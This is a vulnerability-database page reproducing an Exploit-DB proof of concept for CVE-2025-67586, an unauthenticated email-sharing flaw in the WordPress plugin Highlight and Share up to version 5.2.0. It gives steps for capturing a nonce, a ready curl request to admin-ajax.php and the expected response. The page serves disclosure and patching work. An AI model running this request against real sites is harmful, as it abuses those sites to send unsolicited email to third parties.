Vulners
Lucene search
📄 WordPress Highlight and Share 5.2.0 Missing Authentication
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2025-67586 | 20 Dec 202509:00 | – | circl |
 | WordPress plugin Highlight and Share 安全漏洞 | 9 Dec 202500:00 | – | cnnvd |
 | CVE-2025-67586 | 9 Dec 202514:14 | – | cve |
 | CVE-2025-67586 WordPress Highlight and Share plugin <= 5.2.0 - Broken Access Control vulnerability | 9 Dec 202514:14 | – | cvelist |
 | WordPress Plugin 5.2.0 - Broken Access Control | 22 Apr 202600:00 | – | exploitdb |
 | EUVD-2025-202067 | 9 Dec 202518:30 | – | euvd |
 | CVE-2025-67586 | 9 Dec 202516:18 | – | nvd |
 | WordPress Highlight and Share plugin <= 5.2.0 - Broken Access Control vulnerability | 15 Dec 202513:30 | – | patchstack |
 | PT-2025-49960 | 9 Dec 202500:00 | – | ptsecurity |
 | CVE-2025-67586 | 10 Dec 202514:23 | – | redhatcve |
10
# Exploit Title: WordPress Plugin 5.2.0 - Broken Access Control
# Date: 2025-09-20
# Exploit Author: Zeeshan Haider
# Vendor Homepage: https://wordpress.org/plugins/
# Software Link: https://wordpress.org/plugins/highlight-and-share/
# Version: <= 5.2.0 (REQUIRED)
# Tested on: WordPress 6.x, Kali Linux
# CVE: CVE-2025-67586
==> Description
A broken access control vulnerability exists in a WordPress plugin developed by DLX Plugins.
The plugin exposes an unauthenticated AJAX action that allows attackers to abuse the
"Share via Email" functionality without proper permission checks.
An unauthenticated attacker can reuse a valid post nonce to trigger email sharing requests,
leading to unauthorized email sending (email spam / abuse) without user authentication.
==> Privileges Required
None (Unauthenticated)
==> Proof of Concept (PoC)
> Step 1: Pick website with Installed Plugin
> Step 2: Obtain a Valid Nonce
1. Open a public post.
2. Highlight text and click **Share via Email**.
3. Open Developer Tools → Network → XHR.
4. Send the email once.
5. Capture the request containing:
action=has_email_social_modal
nonce=<NONCE>
post_id=<POSTID>
Step 3: Exploit via Unauthenticated Request
> bash cmd: (replace website URL, post URL, and nonce)
curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php' \
-d 'action=has_email_form_submission' \
-d 'formData[postId]=<POSTID>' \
-d 'formData[permalink]=http://localhost/?p=<POSTID>' \
-d 'formData[nonce]=<NONCE>' \
-d 'formData[toEmail][email protected]' \
-d 'formData[subject]=PoC' \
-d 'formData[shareText]=POC test' \
-d 'formData[emailShareType]=selection' \
--compressed
--> Expected JSON response:
{
"success": true,
"data": {
"errors": false,
"message_title": "This post has been shared!",
"message_body": "You have shared this post with [email protected]",
"message_subject": "[Shared Post] <POST TITLE>",
"message_source_name": "Site Name",
"message_source_email": "[email protected]"
}
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Apr 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.14.7
EPSS0.01231
SSVC